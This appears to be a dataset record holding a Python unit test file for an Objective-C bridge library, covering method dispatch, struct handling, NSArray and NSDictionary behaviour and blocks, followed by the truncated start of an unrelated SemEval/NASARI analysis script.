ObjCBoundMethod, 'NSBundle.mainBundle should not be a method')\n\n def test_non_existent_field(self):\n \"An attribute error is raised if you invoke a non-existent field.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # Non-existent fields raise an error.\n with self.assertRaises(AttributeError):\n obj1.field_doesnt_exist\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n obj1.field_doesnt_exist\n\n def test_non_existent_method(self):\n \"An attribute error is raised if you invoke a non-existent method.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # Non-existent methods raise an error.\n with self.assertRaises(AttributeError):\n obj1.method_doesnt_exist()\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n obj1.method_doesnt_exist()\n\n def test_non_existent_static_field(self):\n \"An attribute error is raised if you invoke a non-existent static field.\"\n Example = ObjCClass('Example')\n\n # Non-existent fields raise an error.\n with self.assertRaises(AttributeError):\n Example.static_field_doesnt_exist\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n Example.static_field_doesnt_exist\n\n def test_non_existent_static_method(self):\n \"An attribute error is raised if you invoke a non-existent static method.\"\n Example = ObjCClass('Example')\n\n # Non-existent methods raise an error.\n with self.assertRaises(AttributeError):\n Example.static_method_doesnt_exist()\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n Example.static_method_doesnt_exist()\n\n def test_polymorphic_constructor(self):\n \"Check that the right constructor is activated based on arguments used\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n obj2 = Example.alloc().initWithIntValue_(2242)\n obj3 = Example.alloc().initWithBaseIntValue_intValue_(3342, 3337)\n\n self.assertEqual(obj1.baseIntField, 22)\n self.assertEqual(obj1.intField, 33)\n\n self.assertEqual(obj2.baseIntField, 44)\n self.assertEqual(obj2.intField, 2242)\n\n self.assertEqual(obj3.baseIntField, 3342)\n self.assertEqual(obj3.intField, 3337)\n\n # Protected constructors can't be invoked\n with self.assertRaises(AttributeError):\n Example.alloc().initWithString_(\"Hello\")\n\n def test_static_access_non_static(self):\n \"An instance field/method cannot be accessed from the static context\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n with self.assertRaises(AttributeError):\n obj.staticIntField\n\n with self.assertRaises(AttributeError):\n obj.get_staticIntField()\n\n def test_non_static_access_static(self):\n \"A static field/method cannot be accessed from an instance context\"\n Example = ObjCClass('Example')\n\n with self.assertRaises(AttributeError):\n Example.intField\n\n with self.assertRaises(AttributeError):\n Example.accessIntField()\n\n def test_string_argument(self):\n \"A method with a string argument can be passed.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.duplicateString_(\"Wagga\"), \"WaggaWagga\")\n\n def test_enum_argument(self):\n \"An enumerated type can be used as an argument.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.accessBaseIntField(), 22)\n self.assertEqual(obj.accessIntField(), 33)\n\n class MyEnum(Enum):\n value1 = 8888\n value2 = 9999\n value3 = 3333\n value4 = 4444\n\n obj.mutateBaseIntFieldWithValue_(MyEnum.value1)\n obj.mutateIntFieldWithValue_(MyEnum.value2)\n\n self.assertEqual(obj.accessBaseIntField(), MyEnum.value1.value)\n self.assertEqual(obj.accessIntField(), MyEnum.value2.value)\n\n obj.baseIntField = MyEnum.value3\n obj.intField = MyEnum.value4\n\n self.assertEqual(obj.accessBaseIntField(), MyEnum.value3.value)\n self.assertEqual(obj.accessIntField(), MyEnum.value4.value)\n\n def test_string_return(self):\n \"If a method or field returns a string, you get a Python string back\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.toString(), \"This is an ObjC Example object\")\n\n def test_constant_string_return(self):\n \"If a method or field returns a *constant* string, you get a Python string back\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.smiley(), \"%-)\")\n\n def test_number_return(self):\n \"If a method or field returns a NSNumber, it is converted back to native types\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n self.assertEqual(example.theAnswer(), 42)\n self.assertAlmostEqual(example.twopi(), 2.0 * math.pi, 5)\n\n def test_float_method(self):\n \"A method with a float argument can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.areaOfSquare_(1.5), 2.25)\n\n def test_float_method_send(self):\n \"A method with a float argument can be handled by send_message.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(send_message(example, \"areaOfSquare:\", 1.5, restype=c_float, argtypes=[c_float]), 2.25)\n\n def test_double_method(self):\n \"A method with a double argument can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertAlmostEqual(example.areaOfCircle_(1.5), 1.5 * math.pi, 5)\n\n def test_double_method_send(self):\n \"A method with a double argument can be handled by send_message.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertAlmostEqual(send_message(example, \"areaOfCircle:\", 1.5, restype=c_double, argtypes=[c_double]), 1.5 * math.pi, 5)\n\n @unittest.skipIf(OSX_VERSION and OSX_VERSION < (10, 10),\n \"Property handling doesn't work on OS X 10.9 (Mavericks) and earlier\")\n def test_decimal_method(self):\n \"A method with a NSDecimalNumber arguments can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n result = example.areaOfTriangleWithWidth_andHeight_(Decimal('3.0'), Decimal('4.0'))\n self.assertEqual(result, Decimal('6.0'))\n self.assertIsInstance(result, Decimal, 'Result should be a Decimal')\n \n def test_auto_struct_creation(self):\n \"Structs from method signatures are created automatically.\"\n Example = ObjCClass('Example')\n \n types.unregister_encoding_all(b'{simple=ii}')\n types.unregister_encoding_all(b'{simple}')\n types.unregister_encoding_all(b'{complex=[4s]^?{simple=ii}^{complex}b8b16b8}')\n types.unregister_encoding_all(b'{complex}')\n \n # Look up the method, so the return/argument types are decoded and the structs are registered.\n Example.doStuffWithStruct_\n \n struct_simple = types.ctype_for_encoding(b'{simple=ii}')\n self.assertEqual(struct_simple, types.ctype_for_encoding(b'{simple}'))\n \n simple = struct_simple(123, 456)\n ret = Example.doStuffWithStruct_(simple)\n struct_complex = types.ctype_for_encoding(b'{complex=[4s]^?{simple=ii}^{complex}b8b16b8}')\n self.assertIsInstance(ret, struct_complex)\n self.assertEqual(struct_complex, types.ctype_for_encoding(b'{complex}'))\n self.assertEqual(list(ret.field_0), [1, 2, 3, 4])\n self.assertEqual(ret.field_1.value, None)\n self.assertEqual(ret.field_2.field_0, 123)\n self.assertEqual(ret.field_2.field_1, 456)\n self.assertEqual(cast(ret.field_3, c_void_p).value, None)\n self.assertEqual(ret.field_4, 0)\n self.assertEqual(ret.field_5, 1)\n self.assertEqual(ret.field_6, 2)\n\n def test_sequence_arg_to_struct(self):\n \"Sequence arguments are converted to structures.\"\n Example = ObjCClass('Example')\n \n ret = Example.extractSimpleStruct(([9, 8, 7, 6], None, (987, 654), None, 0, 0, 0))\n struct_simple = types.ctype_for_encoding(b'{simple=ii}')\n self.assertIsInstance(ret, struct_simple)\n self.assertEqual(ret.field_0, 987)\n self.assertEqual(ret.field_1, 654)\n\n def test_struct_return(self):\n \"Methods returning structs of different sizes by value can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n class struct_int_sized(Structure):\n _fields_ = [(\"x\", c_char * 4)]\n types.register_encoding(b'{int_sized=[4c]}', struct_int_sized)\n\n self.assertEqual(example.intSizedStruct().x, b\"abc\")\n class struct_oddly_sized(Structure):\n _fields_ = [(\"x\", c_char * 5)]\n\n types.register_encoding(b'{oddly_sized=[5c]}', struct_oddly_sized)\n self.assertEqual(example.oddlySizedStruct().x, b\"abcd\")\n\n class struct_large(Structure):\n _fields_ = [(\"x\", c_char * 17)]\n\n types.register_encoding(b'{large=[17c]}', struct_large)\n self.assertEqual(example.largeStruct().x, b\"abcdefghijklmnop\")\n\n def test_struct_return_send(self):\n \"Methods returning structs of different sizes by value can be handled when using send_message.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n class struct_int_sized(Structure):\n _fields_ = [(\"x\", c_char * 4)]\n\n self.assertEqual(send_message(example, \"intSizedStruct\", restype=struct_int_sized).x, b\"abc\")\n\n\n class struct_oddly_sized(Structure):\n _fields_ = [(\"x\", c_char * 5)]\n\n self.assertEqual(send_message(example, \"oddlySizedStruct\", restype=struct_oddly_sized).x, b\"abcd\")\n\n class struct_large(Structure):\n _fields_ = [(\"x\", c_char * 17)]\n\n self.assertEqual(send_message(example, \"largeStruct\", restype=struct_large).x, b\"abcdefghijklmnop\")\n\n def test_object_return(self):\n \"If a method or field returns an object, you get an instance of that type returned\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n Thing = ObjCClass('Thing')\n thing = Thing.alloc().initWithName_value_('This is thing', 2)\n\n example.thing = thing\n\n the_thing = example.thing\n self.assertEqual(the_thing.toString(), \"This is thing 2\")\n\n def test_no_convert_return(self):\n Example = ObjCClass(\"Example\")\n example = Example.alloc().init()\n\n res = example.toString(convert_result=False)\n self.assertNotIsInstance(res, ObjCInstance)\n self.assertEqual(str(ObjCInstance(res)), \"This is an ObjC Example object\")\n\n def test_partial_method_no_args(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(), 0)\n\n def test_partial_method_one_arg(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(42), 42)\n\n def test_partial_method_two_args(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(12, extraArg=34), 12+34)\n\n def test_partial_method_lots_of_args(self):\n pystring = \"Uñîçö∂€\"\n pybytestring = pystring.encode(\"utf-8\")\n nsstring = core_foundation.at(pystring)\n buf = create_string_buffer(len(pybytestring) + 1)\n usedLength = NSUInteger()\n remaining = NSRange(0, 0)\n nsstring.getBytes(\n buf,\n maxLength=32,\n usedLength=byref(usedLength),\n encoding=4, # NSUTF8StringEncoding\n options=0,\n range=NSRange(0, 7),\n remainingRange=byref(remaining),\n )\n self.assertEqual(buf.value.decode(\"utf-8\"), pystring)\n\n def test_duplicate_class_registration(self):\n \"If you define a class name twice in the same runtime, you get an error.\"\n\n NSObject = ObjCClass('NSObject')\n\n # First definition should work.\n class MyClass(NSObject):\n pass\n\n # Second definition will raise an error.\n # Without protection, this is a segfault.\n with self.assertRaises(RuntimeError):\n class MyClass(NSObject):\n pass\n\n def test_interface(self):\n \"An ObjC protocol implementation can be defined in Python.\"\n\n results = {}\n\n NSObject = ObjCClass('NSObject')\n\n class Handler(NSObject):\n @objc_method\n def initWithValue_(self, value: int):\n self.value = value\n return self\n\n @objc_method\n def peek_withValue_(self, example, value: int) -> None:\n results['string'] = example.toString() + \" peeked\"\n results['int'] = value + self.value\n\n @objc_method\n def poke_withValue_(self, example, value: int) -> None:\n results['string'] = example.toString() + \" poked\"\n results['int'] = value + self.value\n\n @objc_method\n def reverse_(self, input):\n return ''.join(reversed(input))\n\n @objc_method\n def message(self):\n return \"Alea iacta est.\"\n\n @objc_classmethod\n def fiddle_(cls, value: int) -> None:\n results['string'] = \"Fiddled with it\"\n results['int'] = value\n\n # Create two handler instances so we can check the right one\n # is being invoked.\n handler1 = Handler.alloc().initWithValue_(5)\n handler2 = Handler.alloc().initWithValue_(10)\n\n # Create an Example object, and register a handler with it.\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n example.callback = handler2\n\n # Check some Python-side attributes\n self.assertEqual(handler1.value, 5)\n self.assertEqual(handler2.value, 10)\n\n # Invoke the callback; check that the results have been peeked as expected\n example.testPeek_(42)\n\n self.assertEqual(results['string'], 'This is an ObjC Example object peeked')\n self.assertEqual(results['int'], 52)\n\n example.testPoke_(37)\n\n self.assertEqual(results['string'], 'This is an ObjC Example object poked')\n self.assertEqual(results['int'], 47)\n\n self.assertEqual(example.getMessage(), 'Alea iacta est.')\n\n self.assertEqual(example.reverseIt_('Alea iacta est.'), '.tse atcai aelA')\n\n Handler.fiddle_(99)\n\n self.assertEqual(results['string'], 'Fiddled with it')\n self.assertEqual(results['int'], 99)\n\n def test_class_properties(self):\n \"A Python class can have ObjC properties with synthesized getters and setters.\"\n\n NSObject = ObjCClass('NSObject')\n NSURL = ObjCClass('NSURL')\n\n class URLBox(NSObject):\n\n # takes no type: All properties are pointers\n url = objc_property()\n\n @objc_method\n def getSchemeIfPresent(self):\n if self.url is not None:\n return self.url.scheme\n return None\n\n box = URLBox.alloc().init()\n\n # Default property value is None\n self.assertIsNone(box.url)\n\n # Assign an object via synthesized property setter and call method that uses synthesized property getter\n url = NSURL.alloc().initWithString_('https://www.google.com')\n box.url = url\n self.assertEqual(box.getSchemeIfPresent(), 'https')\n\n # Assign None to dealloc property and see if method returns expected None\n box.url = None\n self.assertIsNone(box.getSchemeIfPresent())\n\n # Try composing URLs using constructors\n base = NSURL.URLWithString('https://pybee.org')\n full = NSURL.URLWithString('contributing/', relativeToURL=base)\n\n self.assertEqual(\n \"Visit %s for details\" % full.absoluteURL,\n \"Visit https://pybee.org/contributing/ for details\"\n )\n\n def test_class_with_wrapped_methods(self):\n \"\"\"An ObjCClass can have wrapped methods.\"\"\"\n\n def deco(f):\n @functools.wraps(f)\n def _wrapper(*args, **kwargs):\n return f(*args, **kwargs)\n return _wrapper\n\n class SimpleMath(NSObject):\n @objc_method\n @deco\n def addOne_(self, num: c_int) -> c_int:\n return num + 1\n\n @objc_classmethod\n @deco\n def subtractOne_(cls, num: c_int) -> c_int:\n return num - 1\n\n simplemath = SimpleMath.alloc().init()\n self.assertEqual(simplemath.addOne_(254), 255)\n self.assertEqual(SimpleMath.subtractOne_(75), 74)\n\n def test_function_NSEdgeInsetsMake(self):\n \"Python can invoke NSEdgeInsetsMake to create NSEdgeInsets.\"\n\n insets = NSEdgeInsets(0.0, 1.1, 2.2, 3.3)\n other_insets = NSEdgeInsetsMake(0.0, 1.1, 2.2, 3.3)\n\n # structs are NOT equal\n self.assertNotEqual(insets, other_insets)\n\n # but their values are\n self.assertEqual(insets.top, other_insets.top)\n self.assertEqual(insets.left, other_insets.left)\n self.assertEqual(insets.bottom, other_insets.bottom)\n self.assertEqual(insets.right, other_insets.right)\n\n def test_cfstring_to_str(self):\n \"CFString/NSString instances can be converted to Python str.\"\n\n self.assertEqual(str(core_foundation.at(\"abcdef\")), \"abcdef\")\n\n def test_objc_const(self):\n \"objc_const works.\"\n \n string_const = objc_const(rubiconharness, \"SomeGlobalStringConstant\")\n self.assertEqual(str(string_const), \"Some global string constant\")\n\n\nclass NSArrayMixinTest(unittest.TestCase):\n nsarray = ObjCClass('NSArray')\n nsmutablearray = ObjCClass('NSMutableArray')\n\n py_list = ['one', 'two', 'three']\n\n def make_array(self, contents=None):\n a = self.nsmutablearray.alloc().init()\n if contents is not None:\n for value in contents:\n a.addObject(value)\n\n return self.nsarray.arrayWithArray(a)\n\n def test_getitem(self):\n a = self.make_array(self.py_list)\n\n for pos, value in enumerate(self.py_list):\n self.assertEqual(a[pos], value)\n\n with self.assertRaises(IndexError):\n a[len(self.py_list) + 10]\n\n def test_len(self):\n a = self.make_array(self.py_list)\n\n self.assertEqual(len(a), len(self.py_list))\n\n def test_iter(self):\n a = self.make_array(self.py_list)\n\n keys = list(self.py_list)\n for k in a:\n self.assertTrue(k in keys)\n keys.remove(k)\n\n self.assertTrue(len(keys) == 0)\n\n def test_contains(self):\n a = self.make_array(self.py_list)\n for value in self.py_list:\n self.assertTrue(value in a)\n\n def test_index(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.index('two'), 1)\n with self.assertRaises(ValueError):\n a.index('umpteen')\n\n def test_count(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.count('one'), 1)\n\n def test_copy(self):\n a = self.make_array(self.py_list)\n b = a.copy()\n self.assertEqual(b, a)\n self.assertEqual(b, self.py_list)\n\n with self.assertRaises(AttributeError):\n b.append('four')\n\n def test_equivalence(self):\n a = self.make_array(self.py_list)\n b = self.make_array(self.py_list)\n\n self.assertEqual(a, self.py_list)\n self.assertEqual(b, self.py_list)\n self.assertEqual(a, b)\n self.assertEqual(self.py_list, a)\n self.assertEqual(self.py_list, b)\n self.assertEqual(b, a)\n\n def test_slice_access(self):\n a = self.make_array(self.py_list * 2)\n self.assertEqual(a[1:4], ['two', 'three', 'one'])\n self.assertEqual(a[:-2], ['one', 'two', 'three', 'one'])\n self.assertEqual(a[4:], ['two', 'three'])\n self.assertEqual(a[1:5:2], ['two', 'one'])\n\n\nclass NSMutableArrayMixinTest(NSArrayMixinTest):\n def make_array(self, contents=None):\n a = self.nsmutablearray.alloc().init()\n if contents is not None:\n for value in contents:\n a.addObject(value)\n\n return a\n\n def test_setitem(self):\n a = self.make_array(self.py_list)\n\n a[2] = 'four'\n self.assertEqual(a[2], 'four')\n\n def test_del(self):\n a = self.make_array(self.py_list)\n del a[0]\n self.assertEqual(len(a), 2)\n self.assertEqual(a[0], 'two')\n\n def test_append(self):\n a = self.make_array()\n a.append('an item')\n self.assertTrue('an item' in a)\n\n def test_extend(self):\n a = self.make_array()\n a.extend(['an item', 'another item'])\n self.assertTrue('an item' in a)\n self.assertTrue('another item' in a)\n\n def test_clear(self):\n a = self.make_array(self.py_list)\n a.clear()\n self.assertEqual(len(a), 0)\n\n def test_count(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.count('one'), 1)\n\n a.append('one')\n self.assertEqual(a.count('one'), 2)\n\n def test_copy(self):\n a = self.make_array(self.py_list)\n b = a.copy()\n self.assertEqual(b, a)\n self.assertEqual(b, self.py_list)\n\n b.append('four')\n\n def test_insert(self):\n a = self.make_array(self.py_list)\n a.insert(1, 'four')\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[1], 'four')\n self.assertEqual(a[2], 'two')\n\n def test_pop(self):\n a = self.make_array(self.py_list)\n self.assertEqual(a.pop(), 'three')\n self.assertEqual(a.pop(0), 'one')\n self.assertEqual(len(a), 1)\n self.assertEqual(a[0], 'two')\n\n def test_remove(self):\n a = self.make_array(self.py_list)\n a.remove('three')\n self.assertEqual(len(a), 2)\n self.assertEqual(a[-1], 'two')\n with self.assertRaises(ValueError):\n a.remove('umpteen')\n\n def test_slice_assignment1(self):\n a = self.make_array(self.py_list * 2)\n a[2:4] = ['four', 'five']\n self.assertEqual(a, ['one', 'two', 'four', 'five', 'two', 'three'])\n\n def test_slice_assignment2(self):\n a = self.make_array(self.py_list * 2)\n a[::2] = ['four', 'five', 'six']\n self.assertEqual(a, ['four', 'two', 'five', 'one', 'six', 'three'])\n\n def test_slice_assignment3(self):\n a = self.make_array(self.py_list * 2)\n a[2:4] = ['four']\n self.assertEqual(a, ['one', 'two', 'four', 'two', 'three'])\n\n def test_bad_slice_assignment1(self):\n a = self.make_array(self.py_list * 2)\n\n with self.assertRaises(TypeError):\n a[2:4] = 4\n\n def test_bad_slice_assignment2(self):\n a = self.make_array(self.py_list * 2)\n\n with self.assertRaises(ValueError):\n a[::2] = [4]\n\n def test_del_slice1(self):\n a = self.make_array(self.py_list * 2)\n del a[-2:]\n self.assertEqual(len(a), 4)\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[-1], 'one')\n\n def test_del_slice2(self):\n a = self.make_array(self.py_list * 2)\n del a[::2]\n self.assertEqual(len(a), 3)\n self.assertEqual(a[0], 'two')\n self.assertEqual(a[1], 'one')\n self.assertEqual(a[2], 'three')\n\n def test_del_slice3(self):\n a = self.make_array(self.py_list * 2)\n del a[::-2]\n self.assertEqual(len(a), 3)\n self.assertEqual(a[0], 'one')\n self.assertEqual(a[1], 'three')\n self.assertEqual(a[2], 'two')\n\n def test_reverse(self):\n a = self.make_array(self.py_list)\n a.reverse()\n\n for pos, value in enumerate(reversed(self.py_list)):\n self.assertEqual(a[pos], value)\n\n\nclass NSDictionaryMixinTest(unittest.TestCase):\n nsdict = ObjCClass('NSDictionary')\n nsmutabledict = ObjCClass('NSMutableDictionary')\n\n py_dict = {\n 'one': 'ONE',\n 'two': 'TWO',\n 'three': 'THREE',\n }\n\n def make_dictionary(self, contents=None):\n d = self.nsmutabledict.alloc().init()\n if contents is not None:\n for key, value in contents.items():\n d.setObject_forKey_(value, key)\n\n return self.nsdict.dictionaryWithDictionary(d)\n\n def test_getitem(self):\n d = self.make_dictionary(self.py_dict)\n\n for key, value in self.py_dict.items():\n self.assertEqual(d[key], value)\n\n with self.assertRaises(KeyError):\n d['NO SUCH KEY']\n\n def test_iter(self):\n d = self.make_dictionary(self.py_dict)\n\n keys = set(self.py_dict)\n for k in d:\n self.assertTrue(k in keys)\n keys.remove(k)\n\n self.assertTrue(len(keys) == 0)\n\n def test_len(self):\n d = self.make_dictionary(self.py_dict)\n self.assertEqual(len(d), len(self.py_dict))\n\n def test_get(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.get('one'), 'ONE')\n self.assertEqual(d.get('two', None), 'TWO')\n self.assertEqual(d.get('four', None), None)\n self.assertEqual(d.get('five', 5), 5)\n self.assertEqual(d.get('six', None), None)\n\n def test_contains(self):\n d = self.make_dictionary(self.py_dict)\n for key in self.py_dict:\n self.assertTrue(key in d)\n\n def test_copy(self):\n d = self.make_dictionary(self.py_dict)\n e = d.copy()\n self.assertEqual(e, d)\n self.assertEqual(e, self.py_dict)\n\n with self.assertRaises(TypeError):\n e['four'] = 'FOUR'\n\n def test_keys(self):\n a = self.make_dictionary(self.py_dict)\n for k1, k2 in zip(sorted(a.keys()), sorted(self.py_dict.keys())):\n self.assertEqual(k1, k2)\n\n def test_values(self):\n a = self.make_dictionary(self.py_dict)\n for v1, v2 in zip(sorted(a.values()), sorted(self.py_dict.values())):\n self.assertEqual(v1, v2)\n\n def test_items(self):\n d = self.make_dictionary(self.py_dict)\n for i1, i2 in zip(sorted(d.items()), sorted(self.py_dict.items())):\n self.assertEqual(i1[0], i2[0])\n self.assertEqual(i1[1], i2[1])\n\nclass NSMutableDictionaryMixinTest(NSDictionaryMixinTest):\n def make_dictionary(self, contents=None):\n d = self.nsmutabledict.alloc().init()\n if contents is not None:\n for key, value in contents.items():\n d.setObject_forKey_(value, key)\n\n return d\n\n def test_setitem(self):\n d = self.make_dictionary()\n for key, value in self.py_dict.items():\n d[key] = value\n\n for key, value in self.py_dict.items():\n self.assertEqual(d[key], value)\n\n def test_del(self):\n d = self.make_dictionary(self.py_dict)\n del d['one']\n self.assertEqual(len(d), 2)\n with self.assertRaises(KeyError):\n d['one']\n\n def test_clear(self):\n d = self.make_dictionary(self.py_dict)\n d.clear()\n self.assertEqual(len(d), 0)\n\n def test_copy(self):\n d = self.make_dictionary(self.py_dict)\n e = d.copy()\n self.assertEqual(e, d)\n self.assertEqual(e, self.py_dict)\n\n e['four'] = 'FOUR'\n\n def test_pop1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.pop('one'), 'ONE')\n self.assertEqual(len(d), 2)\n with self.assertRaises(KeyError):\n d['one']\n\n def test_pop2(self):\n d = self.make_dictionary(self.py_dict)\n\n with self.assertRaises(KeyError):\n d.pop('four')\n\n def test_pop3(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.pop('four', 4), 4)\n\n def test_popitem(self):\n d = self.make_dictionary(self.py_dict)\n\n keys = set(self.py_dict)\n\n while len(d) > 0:\n key, value = d.popitem()\n self.assertTrue(key in keys)\n self.assertEqual(value, self.py_dict[key])\n self.assertTrue(key not in d)\n\n def test_setdefault1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d.setdefault('one', 'default'), 'ONE')\n self.assertEqual(len(d), len(self.py_dict))\n\n def test_setdefault2(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertTrue('four' not in d)\n self.assertEqual(d.setdefault('four', 'FOUR'), 'FOUR')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n self.assertEqual(d['four'], 'FOUR')\n\n def test_setdefault3(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertTrue('four' not in d)\n self.assertEqual(d.setdefault('four'), None)\n self.assertEqual(len(d), len(self.py_dict))\n with self.assertRaises(KeyError):\n d['four']\n\n def test_update1(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d, self.py_dict)\n d.update({'one': 'two', 'three': 'four', 'four': 'FIVE'})\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(d['four'], 'FIVE')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n def test_update2(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d, self.py_dict)\n d.update([('one', 'two'), ('three', 'four'), ('four', 'FIVE')])\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n def test_update3(self):\n d = self.make_dictionary(self.py_dict)\n\n self.assertEqual(d, self.py_dict)\n d.update(one='two', three='four', four='FIVE')\n self.assertNotEqual(d, self.py_dict)\n self.assertEqual(d['one'], 'two')\n self.assertEqual(d['two'], 'TWO')\n self.assertEqual(d['three'], 'four')\n self.assertEqual(d['four'], 'FIVE')\n self.assertEqual(len(d), len(self.py_dict) + 1)\n\n\nclass BlockTests(unittest.TestCase):\n def test_block_property_ctypes(self):\n BlockPropertyExample = ObjCClass(\"BlockPropertyExample\")\n instance = BlockPropertyExample.alloc().init()\n result = ObjCBlock(instance.blockProperty, c_int, c_int, c_int)(1, 2)\n self.assertEqual(result, 3)\n\n def test_block_property_pytypes(self):\n BlockPropertyExample = ObjCClass(\"BlockPropertyExample\")\n instance = BlockPropertyExample.alloc().init()\n result = ObjCBlock(instance.blockProperty, int, int, int)(1, 2)\n self.assertEqual(result, 3)\n\n def test_block_delegate_method_manual_ctypes(self):\n class DelegateManualC(NSObject):\n @objc_method\n def exampleMethod_(self, block):\n ObjCBlock(block, c_void_p, c_int, c_int)(2, 3)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateManualC.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 5)\n\n def test_block_delegate_method_manual_pytypes(self):\n class DelegateManualPY(NSObject):\n @objc_method\n def exampleMethod_(self, block):\n ObjCBlock(block, None, int, int)(2, 3)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateManualPY.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 5)\n\n def test_block_delegate_auto(self):\n class DelegateAuto(NSObject):\n @objc_method\n def exampleMethod_(self, block: objc_block):\n block(4, 5)\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateAuto.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.blockExample()\n self.assertEqual(result, 9)\n\n def test_block_delegate_auto_struct(self):\n class BlockStruct(Structure):\n _fields_ = [\n ('a', c_int),\n ('b', c_int),\n ]\n class DelegateAutoStruct(NSObject):\n @objc_method\n def structBlockMethod_(self, block: objc_block) -> int:\n return block(BlockStruct(42, 43))\n BlockObjectExample = ObjCClass(\"BlockObjectExample\")\n delegate = DelegateAutoStruct.alloc().init()\n instance = BlockObjectExample.alloc().initWithDelegate_(delegate)\n result = instance.structBlockExample()\n self.assertEqual(result, 85)\n\n def test_block_receiver(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n\n values = []\n\n def block(a: int, b: int) -> None:\n values.append(a + b)\n instance.receiverMethod_(block)\n\n self.assertEqual(values, [27])\n\n def test_block_receiver_unannotated(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n\n def block(a, b):\n return a + b\n with self.assertRaises(ValueError):\n instance.receiverMethod_(block)\n\n def test_block_receiver_lambda(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n with self.assertRaises(ValueError):\n instance.receiverMethod_(lambda a, b: a + b)\n\n def test_block_receiver_explicit(self):\n BlockReceiverExample = ObjCClass(\"BlockReceiverExample\")\n instance = BlockReceiverExample.alloc().init()\n\n values = []\n\n block = Block(lambda a, b: values.append(a + b), None, int, int)\n instance.receiverMethod_(block)\n\n self.assertEqual(values, [27])\n\n def test_block_round_trip(self):\n BlockRoundTrip = ObjCClass(\"BlockRoundTrip\")\n instance = BlockRoundTrip.alloc().init()\n\n def block(a: int, b: int) -> int:\n return a + b\n\n returned_block = instance.roundTrip_(block)\n self.assertEqual(returned_block(8, 9), 17)\n","sub_path":"tests/test_rubicon.py","file_name":"test_rubicon.py","file_ext":"py","file_size_in_byte":45211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"329429796","text":"import hashlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.stats import pearsonr\nfrom scipy.stats.stats import spearmanr\n\nSEMEVAL_ANNOTADED_FILE = \"./semval_utils/it.test.data.annotated.tsv\"\nNASARI_PATH = \"./semval_utils/mini_NASARI.tsv\"\nSENSES2SYNSETS_PATH = \"semval_utils\\SemEval17_IT_senses2synsets.txt\"\nSEMEVAL_ANNOTADED_FILE_CONSEGNA2 = \"./semval_utils/it.test.data.annotated.consegna2.tsv\"\n#NASARI_PATH_TERMS = \"./summarizerutils/dd-small-nasari-15.txt\"\nNASARI_PATH_TERMS = \"./summarizerutils/dd-nasari.txt\"\n\ndef get_range(surname):\n nof_elements = 500\n base_idx = 